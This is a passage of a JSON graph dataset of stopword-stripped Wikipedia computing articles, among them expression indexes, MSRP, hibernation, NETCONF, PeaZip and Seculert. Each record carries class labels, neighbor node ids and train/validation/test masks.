      5928,
      3881,
      10024,
      10026,
      10029,
      7983,
      1844,
      9525,
      11060,
      10039,
      11572,
      6972,
      3394,
      3922,
      4439,
      5465,
      349,
      2402,
      2919,
      4458,
      6506,
      364,
      4972,
      9066,
      9593,
      2943,
      10624,
      3462,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      8609,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      7106,
      8132,
      6088,
      969,
      7629,
      3535,
      8659,
      11221,
      1498,
      5594,
      478,
      6114,
      6115,
      6637,
      9709,
      6641,
      499,
      3573,
      2556,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3103,
    "label": 1,
    "text": "Expression_index:expression index expression index also known function based index database index built generic expression rather one columns allows indexes defined common query conditions depend data table actually stored table common use expression index support case-insensitive searching constraints example web site wants make user names case-insensitive still preserve case originally entered user index created lower-case representation user name create unique index lower last_name queries search lower last_name could make use index major databases support expression indexes include db2 since version 10.5 oracle database since release 8i postgresql since least version 7",
    "neighbors": [
      2456,
      8539,
      10340,
      10389
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3104,
    "label": 9,
    "text": "SIMCOS:simcos simcos acronym standing simulation continuous systems computer language development environment computer simulation 1989 developed slovenian experts led borut zupančič purpose language simulation dynamic mathematical models systems given set ordinary differential equations equation oriented compiler type language despite name used discrete simulation well language suits well cssl'67 standard simulation languages portability among languages conforming standard e.g tutsim acsl etc quite simple dos based software occasionally slightly modified run actual versions microsoft windows apart simulation also perform parametrisation series simulations different values parameters linearisation models optimisation finding values parameters criterion function minimised simulation scheme must prepared must described simcos language drawn similarly analogue computer using enclosed block library graphics tool contains basic elements integrators amplifiers summators basic input signals etc often entered program using one text editors e.g edit enclosed dos whichever form entry model used first phase simulation reprocesses space states form rewrites program fortran prepares files input parameters fortran program compiled executable file .exe executed executable program reads parameter values input files performs simulation writes requested calculated values another file terminates simcos takes control display results graphic plot heart executable function integ solve differential equations using one several numerical methods first reads necessary values e.g values parameters initial conditions files calls function deriv model actually described series functions derivatives returned values used selected numerical method requested calculated results written file whole procedure repeated termination condition satisfied continuous simulation dead time laplace transform formula_1 trivial task usually use one padé approximations simulate padé approximation 2nd order 4th order input signal unit step communication interval equals 0.01s length simulation run 5s results compared output built-in discrete function delay requires additional array del case appropriate size y1 result simulation padé approximation 2nd order y2 result simulation padé approximation 4th order y3 result discrete function delay transfer functions padé approximation developed using one simulation schemes model described following program simulation run finished results displayed plots possible trace values plots select plots display turning grid zoom etc slovenian language",
    "neighbors": [
      3448,
      3960,
      6797
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3105,
    "label": 5,
    "text": "Message_Session_Relay_Protocol:message session relay protocol computer networking message session relay protocol msrp protocol transmitting series related instant messages context communications session application instantiates session session description protocol sdp session initiation protocol sip rendezvous methods msrp protocol defined rfc 4975 msrp messages also transmitted using intermediaries peers using relay extensions defined rfc 4976 msrp used rcs context especially instant messaging file transfer photo sharing features msrp similar syntax ietf text based protocol sip http rtsp message either request response uses uris message contains headers body carry type data including binary information unlike sip msrp much simpler first 2 headers must to-path from-path last must content-type significantly reduces complexity parsers messages must also end 7 dash '- characters followed transaction identifier appears first line followed continuation flag single character end line crlf last line end messages makes rather simple find detect message boundaries msrp defined connection-less protocols udp thus one certain response request would arrive connection msrp also relies reliable transport layer guarantees delivery maintains order messages simplifies protocol design msrp uri scheme msrp msrps authority defined rfc 3986 holds ip/domain name possibly port optional session identifier transport additional optional parameters example codice_1 msrp used within sip session msrp session set sip offer-answer model sdp m-line media type message protocol either tcp/msrp msrp tcp tcp/tls/msrp msrp secure tls furthermore msrp uri specified path attribute full sdp example provided rfc fact msrp contains address port time c-line holds address m-line contain port cause ambiguity generally media types use c-line m-line describe address msrp rfc 4975 states information actually specified msrp path may cause devices improperly set session particular b2bua may require alter path per msrp message different devices overcome rfc 6714 cema msrp changes way cema-aware devices use sdp makes cema-aware msrp b2bua implementations much simpler efficient generic open source peer library implemented following programming languages",
    "neighbors": [
      10242,
      5251,
      3460,
      5382,
      4746,
      1036,
      11408,
      3610,
      3228,
      10271,
      9380,
      9511,
      1962,
      9519,
      8758,
      1467,
      4797,
      6208,
      1218,
      6982,
      6855,
      2760,
      1738,
      2892,
      3284,
      4318,
      3812,
      4068,
      6628,
      9572,
      755,
      3959,
      7928,
      10748
    ],
    "mask": "Test"
  },
  {
    "node_id": 3106,
    "label": 4,
    "text": "Graugon_AntiVirus:graugon antivirus graugon antivirus antivirus software based clam antivirus developed maintained graugon software group software undergone several name changes relaunched mid-2008 graugon antivirus first released 2003 antivirus hd1988 labs software initially designed scan network files malicious traits mainly viruses 2005 hd1988 labs merged another team software developers antivirus renamed graugon antivirus may 2010 graugon antivirus average user rating 2.3 5 stars fileforum",
    "neighbors": [
      7739,
      7515,
      2213,
      7983
    ],
    "mask": "None"
  },
  {
    "node_id": 3107,
    "label": 2,
    "text": "Project_Builder:project builder project builder integrated development environment ide originally developed next nextstep operating system rewritten informally dubbed pbx distributed apple computer software development mac os x computer systems prior mac os x v10.3 superseded xcode mac os x 10.3 panther gnustep projectcenter ide rough workalike original nextstep design additional functionality provided projectmanager 3rd-party gnustep ide meant greater usability",
    "neighbors": [
      10470,
      10478,
      8303,
      8304,
      7983,
      213,
      7806
    ],
    "mask": "Test"
  },
  {
    "node_id": 3108,
    "label": 4,
    "text": "Recovery_procedure:recovery procedure telecommunication recovery procedure process attempts bring system back normal operating state examples",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 3109,
    "label": 2,
    "text": "Hibernation_(computing):hibernation computing hibernation suspend disk computing powering computer retaining state upon hibernation computer saves contents random access memory ram hard disk non-volatile storage upon resumption computer exactly entering hibernation hibernating hardware powered like regular shutdown hibernation means avoiding burden saving unsaved data shutting restoring running programs powering back hibernation used laptops limited battery power available set happen automatically low battery alarm desktops also support hibernation mainly general energy saving measure many systems also support low-power sleep mode processing functions machine powered using little power preserve contents ram support waking instantaneous resumption one advantages sleep mode hibernation hibernated system must start read data back ram typically takes time system sleep mode needs power cpu display almost instantaneous hand system sleep mode still consumes power keep data ram detaching power system sleep mode results data loss cutting power system hibernation risk hibernated system resume power restored shut hibernated systems may consume standby power unless unplugged sleep mode hibernation combined contents ram copied non-volatile storage computer enters sleep mode approach combines benefits sleep mode hibernation machine resume instantaneously state including open unsaved files survives power outage hybrid sleep consumes much power sleep mode hibernation powers computer early implementations hibernation used bios modern operating systems usually handle hibernation hibernation defined sleeping mode s4 acpi specification windows computers hibernation available hardware device drivers acpi plug-and-play–compliant hibernation invoked start menu command line windows 95 supports hibernation hardware manufacturer-supplied drivers compatible hardware bios present since windows 95 supports advanced power management apm hibernation called suspend-to-disk windows 98 later support acpi however hibernation often caused problems since hardware fully acpi 1.0 compliant wdm drivers also issues fat32 file system windows 2000 first windows support hibernation operating system level os-controlled acpi s4 sleep state without special drivers hardware manufacturer hidden system file named hiberfil.sys root boot partition used store contents ram computer hibernates windows 2000 file big total ram installed windows last release windows 9x family also supports os controlled hibernation requires disk space equal computer ram windows xp improved support hibernation hibernation resumption much faster memory pages compressed using improved algorithm compression overlapped disk writes unused memory pages freed dma transfers used i/o hiberfil.sys contains information including processor state file documented security researcher matthieu suiche black hat briefings 2008 also provided computer forensics framework manage convert file readable memory dump compression algorithm later documented microsoft well although windows xp added support 4 gigabytes memory windows xp 64-bit edition windows xp professional x64 edition operating system well windows server 2003 windows vista windows server 2008 support hibernation amount memory installed performance issues associated saving large pool data ram disk windows vista introduced hybrid sleep feature saves contents memory hard disk instead powering enters sleep mode power lost computer resume hibernated windows 7 introduced compression hibernation file set default size 75 total physical memory microsoft also recommends increase size using codice_1 tool rare workloads memory footprint exceeds amount set anywhere 50 100 although decreasing recommended windows 8 resume-from-hibernation algorithm multi-core optimized windows 8 also introduces hybrid boot feature users select shut option hibernates computer closes programs logs user session hibernating according microsoft regular hibernation includes data memory pages takes longer written disk comparison user session closed hibernation data much smaller therefore takes less time write disk resume windows 8 also saves kernel image users option performing traditional shutdown holding shift key clicking shut hibernation often under-used business environments difficult enable large network computers without resorting third-party pc power management software omission microsoft criticized led huge waste energy third-party power management programs offer features beyond present windows products offer active directory integration per-user per-machine settings advanced power plans scheduled power plans anti-insomnia features enterprise power usage reporting notable vendors include 1e nightwatchman data synergy powerman software faronics power save verdiem surveyor possible disable hibernation delete codice_2 macs feature known safe sleep saves contents volatile memory system hard disk time mac enters sleep mode mac instantaneously wake sleep mode power ram lost however power supply interrupted removing batteries without ac power connection mac would wake safe sleep instead restoring memory contents hard drive safe sleep hibernation process occurs regular sleep apple menu hibernate option safe sleep capability added mac models starting october 2005 powerbook g4 double-layer sd safe sleep requires mac os x v10.4 higher shortly apple started supporting safe sleep mac enthusiasts released hack enable feature much older mac computers running mac os x v10.4 classic mac os also supported hibernation feature dropped apple linux kernel hibernation implemented swsusp built 2.6 series alternative implementation tuxonice available patches kernel version 3.4 tuxonice provides advantages support symmetric multiprocessing preemption another alternative implementation uswsusp three refer suspend-to-disk",
    "neighbors": [
      3971,
      1540,
      5000,
      6281,
      6797,
      7189,
      10646,
      929,
      5922,
      3496,
      1577,
      5928,
      8616,
      7605,
      3382,
      576,
      4161,
      7106,
      1098,
      1741,
      7375,
      4178,
      10839,
      11095,
      7519,
      8161,
      2275,
      8676,
      9319,
      5225,
      4074,
      1515,
      4207,
      4470,
      2811,
      9340,
      3197
    ],
    "mask": "Test"
  },
  {
    "node_id": 3110,
    "label": 5,
    "text": "Jughead_(search_engine):jughead search engine jughead search engine system gopher protocol distinct veronica searches single server time jughead developed rhett jones 1993 university utah name jughead originally chosen match archie search engine jughead jones archie friend archie comics later backronym developed jonzy universal gopher hierarchy excavation display released original author gnu general public license 2006 source code modernized better run current posix systems due trademark issues modified version called jugtail made available download gnu savannah see external links",
    "neighbors": [
      6657,
      7943,
      9757,
      10910,
      10791,
      9905,
      9908,
      4661,
      3191,
      10808,
      5054,
      10174,
      10057,
      10060,
      4310,
      5078,
      6231,
      10722,
      494,
      1520,
      9843,
      6133,
      119,
      3961,
      5114,
      8443,
      637
    ],
    "mask": "Test"
  },
  {
    "node_id": 3111,
    "label": 4,
    "text": "Privacy_Impact_Assessment:privacy impact assessment privacy impact assessment pia process assists organizations identifying minimizing privacy risks new projects policies privacy impact assessment type impact assessment conducted organization typically government agency corporation access large amount sensitive private data individuals flowing system organization audits processes sees processes affect might compromise privacy individuals whose data holds collects processes pias conducted various sub-agencies u.s. department homeland security dhs many others pia designed accomplish three goals privacy impact report seeks identify record essential components proposed system containing significant amounts personal information establish privacy risks associated system managed pia sometimes go beyond assessment system consider critical downstream effects people affected way proposal since pias measure organization ability keep private information safe pia conducted whenever said organization possession personal information employees and/or clients include limited name age phone numbers emails etc pia also conducted instance business organization question possession information otherwise sensitive cases security systems private sensitive information organizations undergoing changes could lead risk privacy leaks according presentation international association privacy professionals congress pias following benefits privacy impact assessments summed four step process 1970s technology assessment ta created united states office technology assessment ta used determine societal social repercussions new technologies similarly around time came environmental impact assessments eia reaction social push sixties green movements method impact assessments acted precursors creation pia privacy impact statement much less extensive version pia came late eighties 1990s became need measure effectiveness company organization data security especially data stored computers electronic platforms extensive pias started used frequently corporations governments mid 1990s used organizations around world several governments including new zealand canada australia united states department homeland security assess privacy risk systems addition several countries corporations use assessment systems similar pias data risk analysis e-government act 2002 section 208 establishes requirement agencies conduct privacy impact assessments pias electronic information systems collections assessment practical method evaluating privacy information systems collections documented assurance privacy issues identified adequately addressed process designed guide sec system owners developers assessing privacy early stages development throughout systems development life cycle sdlc determine project affect privacy individuals whether project objectives met also protecting privacy general data protection regulation gdpr states data protection impact assessment dpia mandatory cases piaf privacy impact assessment framework data protection privacy rights european commission co-funded project aims encourage eu member states adopt progressive privacy impact assessment policy means addressing needs challenges related privacy processing personal data",
    "neighbors": [
      2818,
      1930,
      9901,
      1169,
      7228
    ],
    "mask": "None"
  },
  {
    "node_id": 3112,
    "label": 4,
    "text": "Martin_McKeay:martin mckeay martin mckeay born june 29 1971 united states computer security expert blogger works akamai technologies security evangelist writes one popular security blogs also podcast called network security podcast qualified security assessor 2006 started blogging computer world product evangelist stillsecure speaker many conferences including hacker halted rsa conference def con advocate payment card industry data security standard",
    "neighbors": [
      8170,
      3353,
      7899,
      1182,
      9855
    ],
    "mask": "Test"
  },
  {
    "node_id": 3113,
    "label": 3,
    "text": "Dragon_Slayer_(video_game):dragon slayer video game dragon slayer began dragon slayer series banner encompasses number popular falcom titles sorcerian legacy wizard dragon slayer early example action role-playing game genre laid foundations building prototypical action role-playing elements panorama toh 1983 created yoshio kiya nihon falcom well namco tower druaga 1984 dragon slayer often considered first true action role-playing game contrast earlier turn-based roguelikes dragon slayer dungeon crawl role-playing game entirely real-time action-oriented combat combining arcade style action mechanics traditional role-playing mechanics dragon slayer featured in-game map help dungeon-crawling required item management due inventory limited one item time featured item-based puzzles similar legend zelda dragon slayer overhead action-rpg formula used many later games along competitor hydlide dragon slayer laid foundations action rpg genre including franchises ys legend zelda",
    "neighbors": [
      770,
      10217,
      9006,
      10931,
      11443,
      5753,
      9658,
      1596,
      6077
    ],
    "mask": "Test"
  },
  {
    "node_id": 3114,
    "label": 6,
    "text": "PeaZip:peazip peazip free open-source file manager file archiver microsoft windows linux bsd made giorgio tani supports native pea archive format featuring compression multi volume split flexible authenticated encryption integrity check schemes mainstream formats special focus handling open formats supports 188 file extensions version 6.0.0 peazip mainly written free pascal using lazarus peazip released terms gnu lesser general public license program features archive browser interface search history features intuitive navigation archive content allows application fine-grained multiple exclusion inclusion filter rules archive flat browsing mode possible alternative archive browsing method peazip allows users run extracting archiving operations automatically using command-line generated exporting job defined gui front-end also create edit restore archive layout speeding archiving backup operation definition notable features program include archive conversion file splitting joining secure file deletion byte-to-byte file comparison archive encryption checksum/hash files find duplicate files batch renaming system benchmarking random passwords/keyfiles generation view image thumbnails multi threaded fly thumbnails generation without saving image cache host machine integration windows explorer context menu addition program user interface including icons color scheme customized peazip available ia-32 x86-64 natively standalone portable application installable package microsoft windows linux deb rpm tgz compiled gtk2 qt widgetset bsd gtk2 available also portableapps package .paf.exe along popular general-purpose archive formats like 7z tar zip etc. peazip supports paq lpaq formats although usually recommended general purpose use due high memory usage low speed formats included value cutting edge compression technology providing compression ratio amongst best data structures peazip supports encryption aes 256-bit cipher 7z zip archive formats peazip native pea format freearc arc format supported ciphers aes 256-bit blowfish twofish 256 serpent 256 pea format ciphers used eax authenticated encryption mode graphical frontend progress bar less reliable native console progress indicator various backend utilities critical follow real time progress work possible set program use native console interface graphical console interfaces backend utilities pea acronym pack encrypt authenticate archive file format general purpose archiving format featuring compression multiple volume output developers goal offer flexible security model authenticated encryption provides privacy authentication data redundant integrity checks ranging checksums cryptographically strong hashes defining three different levels communication control streams objects volumes developed conjunction peazip file archiver peazip universal extractor support pea archive format peazip acts graphical front-end numerous third-party open source royalty-free utilities including separate plugin optional utilities run console mode graphical wrapper allows user-friendly handling output information prior release 5.3 peazip installers windows win64 bundled opencandy advertising module installation offered optional installation recommended third-party software official download page provided alternative installers without module named 'plain release 5.3 april 2014 peazip longer ad-supported bundle peazip portable peazip linux packages never featured ad-supported bundle",
    "neighbors": [
      3969,
      5380,
      9988,
      6022,
      10121,
      1420,
      6797,
      8847,
      9874,
      1940,
      3222,
      9880,
      5663,
      9121,
      546,
      11368,
      3114,
      10027,
      2095,
      2864,
      7983,
      950,
      823,
      4406,
      6713,
      10817,
      1475,
      2755,
      11076,
      1352,
      4296,
      3659,
      1101,
      4174,
      8909,
      10317,
      4561,
      722,
      8147,
      10575,
      2389,
      10971,
      3804,
      11614,
      1631,
      3296,
      9953,
      5858,
      10851,
      10857,
      6759,
      5096,
      7529,
      106,
      4459,
      5356,
      237,
      1646,
      4845,
      8940,
      9320,
      9964,
      7667,
      10476,
      6389,
      4089,
      894,
      10623
    ],
    "mask": "None"
  },
  {
    "node_id": 3115,
    "label": 5,
    "text": "Repeater:repeater telecommunications repeater electronic device receives signal retransmits repeaters used extend transmissions signal cover longer distances received side obstruction types repeaters broadcast identical signal alter method transmission example another frequency baud rate several different types repeaters telephone repeater amplifier telephone line optical repeater optoelectronic circuit amplifies light beam optical fiber cable radio repeater radio receiver transmitter retransmits radio signal broadcast relay station repeater used broadcast radio television information-bearing signal passes communication channel progressively degraded due loss power example telephone call passes wire telephone line power electric current represents audio signal dissipated heat resistance copper wire longer wire power lost smaller amplitude signal far end long enough wire call audible end similarly farther radio station receiver weaker radio signal poorer reception repeater electronic device communication channel increases power signal retransmits allowing travel since amplifies signal requires source electric power term repeater originated telegraphy 19th century referred electromechanical device relay used regenerate telegraph signals use term continued telephony data communications computer networking repeaters work actual physical signal attempt interpret data transmitted operate physical layer first layer osi model used increase range telephone signals telephone line frequently used trunklines carry long distance calls analog telephone line consisting pair wires consists amplifier circuit made transistors use power dc current source increase power alternating current audio signal line since telephone duplex bidirectional communication system wire pair carries two audio signals one going direction telephone repeaters bilateral amplifying signal directions without causing feedback complicates design considerably telephone repeaters first type repeater first applications amplification development telephone repeaters 1900 1915 made long distance phone service possible telecommunications cables fiber optic cables use optical repeaters invention electronic amplifiers mechanically coupled carbon microphones used amplifiers telephone repeaters turn 20th century found negative resistance mercury lamps could amplify used invention audion tube repeaters around 1916 made transcontinental telephony practical 1930s vacuum tube repeaters using hybrid coils became commonplace allowing use thinner wires 1950s negative impedance gain devices popular transistorized version called e6 repeater final major type used bell system low cost digital transmission made voiceband repeaters obsolete frequency frogging repeaters commonplace frequency-division multiplexing systems middle late 20th century type telephone repeater used underwater submarine telecommunications cables used increase range signals fiber optic cable digital information travels fiber optic cable form short pulses light light made particles called photons absorbed scattered fiber optical communications repeater usually consists phototransistor converts light pulses electrical signal amplifier increase power signal electronic filter reshapes pulses laser converts electrical signal light sends fiber however optical amplifiers developed repeaters amplify light without need converting electric signal first used extend range coverage radio signal history radio relay repeaters began 1898 publication johann mattausch austrian journal zeitschrift für electrotechnik v. 16 35 36 proposal translator primitive suitable use first relay system radio repeaters really functioned invented 1899 emile guarini-foresio radio repeater usually consists radio receiver connected radio transmitter received signal amplified retransmitted often another frequency provide coverage beyond obstruction usage duplexer allow repeater use one antenna receive transmit time radio repeaters improve communication coverage systems using frequencies typically line-of-sight propagation without repeater systems limited range curvature earth blocking effect terrain high buildings repeater hilltop tall building allow stations line-of-sight range communicate reliably radio repeaters may also allow translation one set radio frequencies another example allow two different public service agencies interoperate say police fire services city neighboring police departments may provide links public switched telephone network well typically repeater station listens one frequency transmits second b mobile stations listen signals channel b transmit channel difference two frequencies may relatively small compared frequency operation say 1 often repeater station use antenna transmission reception highly selective filters called duplexers separate faint incoming received signal billions times powerful outbound transmitted signal sometimes separate transmitting receiving locations used connected wire line radio link repeater station designed simultaneous reception transmission mobile units need equipped bulky costly duplexers transmit receive time mobile units repeater system may provided talkaround channel allows direct mobile-to-mobile operation single channel may used reach repeater system communications requiring attention mobiles talkaround channel may repeater output frequency repeater retransmit signals output frequency engineered radio communication system designer analyze coverage area desired select repeater locations elevations antennas operating frequencies power levels permit predictable level reliable communication designed coverage area repeaters divided two types depending type data handle type used channels transmit data form analog signal voltage current proportional amplitude signal audio signal also used trunklines transmit multiple signals using frequency division multiplexing fdm analog repeaters composed linear amplifier may include electronic filters compensate frequency phase distortion line digipeater used channels transmit data binary digital signals data form pulses two possible values representing binary digits 1 0 digital repeater amplifies signal also may retime resynchronize reshape pulses repeater performs retiming resynchronizing functions may called regenerator",
    "neighbors": [
      2306,
      2787,
      7490,
      3847,
      5162,
      8811,
      3088,
      3156,
      9373
    ],
    "mask": "Test"
  },
  {
    "node_id": 3116,
    "label": 4,
    "text": "Seculert:seculert seculert cloud-based cyber security technology company based israel company ’ technology designed detect breaches advanced persistent threats apts attacking networks seculert ’ business based malware research ability uncover malware gone undetected traditional measures 2012 company named one hottest new security start-ups new york times finalist sc magazine awards rookie security company year seculert founded 2010 former rsa fraudaction research lab manager aviv raff former sandisk product marketing manager dudi matot former finjan vp operations alex milstein 2011 company launched first offering seculert echo seculert sense traffic log analysis released october 2012 rsa conference february 2013 seculert unveiled beta version seculert swamp malware analysis sandbox seculert privately funded headquartered petah tikva israel july 2012 company announced 5.35m venture funding yl ventures norwest venture partners july 2013 seculert announced raised additional 10 million series b funding sequoia capital january 31 2017 seculert acquired radware company based mahwah new jersey usa january 2012 seculert discovered ramnit started targeting facebook accounts considerable success stealing 45,000 facebook login credentials worldwide mostly people uk france march 2012 seculert reported kelihos botnet distributed facebook worm still active spreading july 2012 seculert conjunction kaspersky lab uncovered ongoing cyber espionage campaign targeting iran middle eastern countries dubbed mahdi malware august 2012 seculert kaspersky lab symantec revealed discovery shamoon sophisticated malware attacked qatar natural gas firm rasgas saudi arabian oil company aramco december 2012 seculert uncovered dexter new malware steals payment card data point-of-sale terminals used stores hotels businesses victim businesses english-speaking 42 percent based north america 19 percent u.k. dexter infected systems running variety different versions windows including xp home server server 2003 windows 7 january 2013 kaspersky labs kl revealed cyber espionage operation dubbed red october next day seculert identified special folder used attackers additional attack vector vector attackers sent email embedded link specially crafted php web page webpage exploited vulnerability java background downloaded executed malware automatically january 2014 seculert research lab identified new targeted attack used xtreme rat attack used spear phishing emails target israeli organizations deploy piece advanced malware date 15 machines compromised including ones belonging civil administration judea samaria dyre wolf malware campaign made headlines early april banking trojan bypassed 2 factor authentication order steal 1 million corporate bank accounts several detection protection technologies combined cloud-based solution works identify new cyber threats automated traffic log analysis cloud-based analysis engine leverages http/s gateway traffic logs collected time analyzing petabytes data identify malware activity automatically identifies unknown malware detecting malicious patterns anomalies seculert traffic log analysis pinpoints evidence targeted attacks elastic sandbox elastic cloud-based automated malware analysis environment seculert elastic sandbox includes automatic analysis classification suspicious files time analyzes potentially malicious files different platforms simulate different geographic regions seculert elastic sandbox generates malware behavioral profiles crunching 40,000 malware samples daily basis leveraging data crowdsourced threat repository",
    "neighbors": [
      9664,
      7809,
      9569,
      9761,
      10756,
      10745,
      4304,
      11152,
      9465,
      7899
    ],
    "mask": "Test"
  },
  {
    "node_id": 3117,
    "label": 3,
    "text": "Arteris:arteris arteris inc. multinational technology firm develops on-chip interconnect fabric technology used system-on-chip soc semiconductor designs variety devices particularly mobile consumer markets company specializes development distribution network-on-chip noc interconnect intellectual property ip solutions best known flagship product arteris flexnoc used 60 percent mobile wireless soc designs arteris inc. headquartered campbell california k. charles janac company ’ president ceo 2012 silicon valley san jose business journal ranked arteris 4th fastest-growing private company silicon valley arteris also inc. 500 list america ’ fastest growing companies two years running arteris founded 2003 philippe boucard two engineering executives worked together t.sqware startup acquired globespan company executives wished address problems existing monolithic bus crossbar interconnect technologies wire routing congestion increased heat power consumption failed timing closure increased die area firm ’ leadership sought received venture capital totaling 44.1 million creation new technology investors including arm holdings crescendo ventures docomo capital qualcomm synopsys tvm capital ventech 2006 arteris developed first commercially available noc ip product called noc solution followed 2009 advanced product flexnoc products used “ packetization distributed network small interconnect elements address congestion timing power performance issues. ” arteris marketed flexnoc improvement traditional socs interconnect fabrics citing reduction gate count 30 percent reduction wires 50 percent compact chip floor compared functionally equivalent hybrid bus crossbar designers socs began take advantage technology ’ increased design efficiency flexibility significant reduction production costs 2012 company 40 semiconductor customers including qualcomm samsung texas instruments toshiba lg electronics 200 million socs produced arteris ip company ’ volume projected grow 1 billion units per year 2015 october 2013 qualcomm technologies inc. acquired flexnoc network-on-chip product portfolio arteris retained existing customer contracts continue licensing flexnoc modifying source code customer support qualcomm provide engineering deliverables flexnoc product line updates arteris qualcomm maintain ownership interest arteris february 2014 arteris named craig forrest chief technology officer dave parry vice president engineering benoit de lescure director application engineering arteris claims 117 licensees interconnect ip product since inception 2003 approximately 65 active customers publicly disclosed licensees include top-20 semiconductor makers samsung electronics qualcomm toshiba semiconductor texas instruments stmicroelectronics renesas electronics freescale semiconductor marvell technology group well systems automotive companies like mobileye arteris also signed licenses chinese semiconductor companies including baidu hisilicon huawei actions semiconductor allwinner infotm ingenic leadcore nufront rda semiconductor rockchip socle spreadtrum publicly announced licensees arteris products include altera intel core logic csr gct guc ic-logic lg megachips movidius intel mtekvision ntt electronics open-silicon pixelworks renesas electronics sckipio schneider st-ericsson ericsson via telecom arteris offers number network-on-chip products including flexnoc high performance socs flexlli mipi interchip link ip connecting multiple chips dies flexway interconnect fabric smaller socs firm ’ technology used variety consumer electronics including mobile phones tablets modems gaming consoles digital televisions automotive systems applications",
    "neighbors": [
      7747,
      2788,
      1541,
      6981,
      9863,
      424,
      11333,
      11405,
      4188,
      11282,
      3511,
      4124,
      10303
    ],
    "mask": "None"
  },
  {
    "node_id": 3118,
    "label": 5,
    "text": "NETCONF:netconf network configuration protocol netconf network management protocol developed standardized ietf developed netconf working group published december 2006 rfc 4741 later revised june 2011 published rfc 6241 netconf protocol specification internet standards track document netconf provides mechanisms install manipulate delete configuration network devices operations realized top simple remote procedure call rpc layer netconf protocol uses extensible markup language xml based data encoding configuration data well protocol messages protocol messages exchanged top secure transport protocol netconf protocol conceptually partitioned four layers netconf protocol implemented network devices routers switches major equipment vendors one particular strength netconf support robust configuration change using transactions involving number devices ietf developed simple network management protocol snmp late 1980s proved popular network management protocol early part 21st century became apparent spite originally intended snmp used configure network equipment mainly used network monitoring june 2002 internet architecture board key members ietf network management community got together network operators discuss situation results meeting documented rfc 3535 turned operators primarily using proprietary command line interfaces cli configure devices number features operators liked including fact text-based opposed ber-encoded snmp addition many equipment vendors provide option completely configure devices via snmp operators generally liked write scripts help manage boxes found snmp cli lacking number ways notably unpredictable nature output content formatting output prone change unpredictable ways around time juniper networks using xml-based network management approach brought ietf shared broader community collectively two events led ietf may 2003 creation netconf working group working group chartered work network configuration protocol would better align needs network operators equipment vendors first version base netconf protocol published rfc 4741 december 2006 several extensions published subsequent years notifications rfc 5277 july 2008 partial locks rfc 5717 december 2009 with-defaults rfc 6243 june 2011 system notifications rfc 6470 february 2012 access control rfc 6536 march 2012 revised version base netconf protocol published rfc 6241 june 2011 content netconf operations well-formed xml content related network management subsequently support encoding javascript object notation json also added netmod working group completed work define human-friendly modeling language defining semantics operational data configuration data notifications operations called yang yang defined rfc 6020 version 1 rfc 7950 version 1.1 accompanied common yang data types found rfc 6991 summer 2010 netmod working group re-chartered work core configuration models system interface routing well work compatibility snmp modeling language base protocol defines following protocol operations basic netconf functionality extended definition netconf capabilities set additional protocol features implementation supports communicated server client capability exchange portion session setup mandatory protocol features included capability exchange since assumed rfc 4741 defines number optional capabilities including xpath validate note rfc 6241 obsoletes rfc 4741 capability support subscribing receiving asynchronous event notifications published rfc 5277 document defines create-subscription operation enables creating real-time replay subscriptions notifications sent asynchronously using notification construct also defines interleave capability supported basic notification capability facilitates processing netconf operations subscription active capability support partial locking running configuration defined rfc 5717 allows multiple sessions edit non-overlapping sub-trees within running configuration without capability lock available entire configuration capability monitor netconf protocol defined rfc 6022 document contains data model including information netconf datastores sessions locks statistics facilitates management netconf server also defines methods netconf clients discover data models supported netconf server defines get-schema operation retrieve netconf messages layer provides simple transport-independent framing mechanism encoding every netconf message well-formed xml document rpc result linked rpc invocation message-id attribute netconf messages pipelined i.e. client invoke multiple rpcs without wait rpc result messages first rpc messages defined rfc 6241 notification messages defined rfc 5277",
    "neighbors": [
      6993,
      3133
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3119,
    "label": 9,
    "text": "David_Luckham:david luckham david luckham emeritus professor electrical engineering stanford university graduate student mit one implementers first lisp system best known originator complex event processing cep proposed book power events published 2002 cep consists set concepts techniques processing real time events extracting information event streams arrive cep since become enabling technology many systems used take immediate action response incoming streams events applications described book may found many sectors business including stock market trading systems mobile devices internet operations fraud detection transportation industry governmental intelligence gathering book also describes advanced event processing techniques event abstraction event hierarchies yet general practice luckham latest book event processing business published wiley nov. 2012 david luckham held faculty invited faculty positions mathematics computer science eight major universities europe united states one founders rational software inc. 1981 supplied ada compiler company first products developed served member initial software development team acknowledged leader high-level multiprocessing programming languages annotation languages event-based simulation systems hardware software architectures dr. luckham published one hundred technical articles two winning acm/ieee best paper awards born kingston jamaica raised london blitz world war ii holds m.sc london ph.d. mit degrees mathematics computer science",
    "neighbors": [
      4992,
      10752,
      11269,
      3334,
      5751,
      6919,
      7562,
      2062,
      9231,
      2577,
      1301,
      9749,
      9877,
      8728,
      4633,
      6556,
      3869,
      10012,
      2335,
      6047,
      8226,
      4516,
      5031,
      9128,
      5803,
      2225,
      10547,
      11255,
      311,
      2105,
      7867,
      6717,
      4799,
      5569,
      6594,
      8771,
      4550,
      7880,
      8908,
      1613,
      205,
      3408,
      11218,
      9299,
      10712,
      3034,
      3675,
      11226,
      10463,
      7392,
      7904,
      11488,
      7267,
      10083,
      8293,
      6502,
      2666,
      3051,
      5360,
      5361,
      8435,
      3446,
      1783,
      6906,
      7805
    ],
    "mask": "None"
  },
  {
    "node_id": 3120,
    "label": 8,
